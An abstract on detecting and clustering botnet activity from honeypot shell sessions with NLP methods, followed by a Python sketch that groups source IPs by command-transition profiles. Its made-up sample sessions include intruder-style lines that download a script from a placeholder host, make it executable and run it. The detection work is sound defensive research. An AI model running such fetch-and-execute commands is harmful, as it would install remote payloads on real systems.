Computer security has been plagued by increasingly formidable, dynamic,
hard-to-detect, hard-to-predict, and hard-to-characterize hacking techniques.
Such techniques are often deployed in self-propagating worms that automatically
infect vulnerable computer systems and assemble them into large bot
networks, which are then used to launch coordinated attacks on designated
targets. In this work, we investigate novel applications of Natural Language
Processing (NLP) methods to detect and correlate botnet behaviors through the
analysis of honeypot data. In our approach, we take the behaviors observed in shell
commands issued by intruders during captured Internet sessions and reduce them
to collections of stochastic processes that are, in turn, processed with
machine learning techniques to build classifiers and predictors. Our technique
makes it possible to cluster botnet source IP addresses even when attackers
try to obfuscate their penetration attempts through rapid or random
permutation techniques.
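
As a rough illustration of the general idea, and not the method used in this work, the sketch below treats each source IP's shell session as a first-order Markov-style process over command names and groups IPs whose transition profiles are similar. The function names, the cosine-similarity measure, the greedy grouping rule, and the 0.5 threshold are all assumptions made for this example; the sample sessions are invented and use documentation-reserved addresses.

```python
from collections import Counter
from math import sqrt


def transition_counts(commands):
    """Count transitions between consecutive command names in one session.

    Only the first token of each command line is kept (an assumption), so
    arguments such as URLs or file names do not affect the profile.
    """
    names = [c.split()[0] for c in commands if c.strip()]
    return Counter(zip(names, names[1:]))


def cosine(a, b):
    """Cosine similarity between two sparse count vectors (Counters)."""
    dot = sum(a[k] * b[k] for k in a.keys() & b.keys())
    norm_a = sqrt(sum(v * v for v in a.values()))
    norm_b = sqrt(sum(v * v for v in b.values()))
    return dot / (norm_a * norm_b) if norm_a and norm_b else 0.0


def cluster_by_similarity(sessions, threshold=0.5):
    """Greedy single-pass grouping of source IPs by transition profile.

    `sessions` maps a source IP string to its list of shell commands.
    Each IP joins the first cluster whose first member is similar enough,
    otherwise it starts a new cluster.
    """
    profiles = {ip: transition_counts(cmds) for ip, cmds in sessions.items()}
    clusters = []
    for ip in sorted(profiles):
        for cluster in clusters:
            if cosine(profiles[ip], profiles[cluster[0]]) >= threshold:
                cluster.append(ip)
                break
        else:
            clusters.append([ip])
    return clusters


# Hypothetical honeypot sessions, invented for illustration only.
example_sessions = {
    "192.0.2.10": ["uname -a", "wget http://example.invalid/a.sh",
                   "chmod +x a.sh", "./a.sh"],
    "192.0.2.11": ["uname -m", "wget http://example.invalid/b.sh",
                   "chmod 777 b.sh", "./b.sh"],
    "198.51.100.7": ["cat /proc/cpuinfo", "free -m", "ps aux"],
}
print(cluster_by_similarity(example_sessions))
```

In this toy data the first two addresses share the `uname`, `wget`, `chmod` transitions despite differing arguments and payload names, so they fall into one group, while the third address forms its own. A real pipeline would need a richer representation and a learned classifier rather than a fixed threshold.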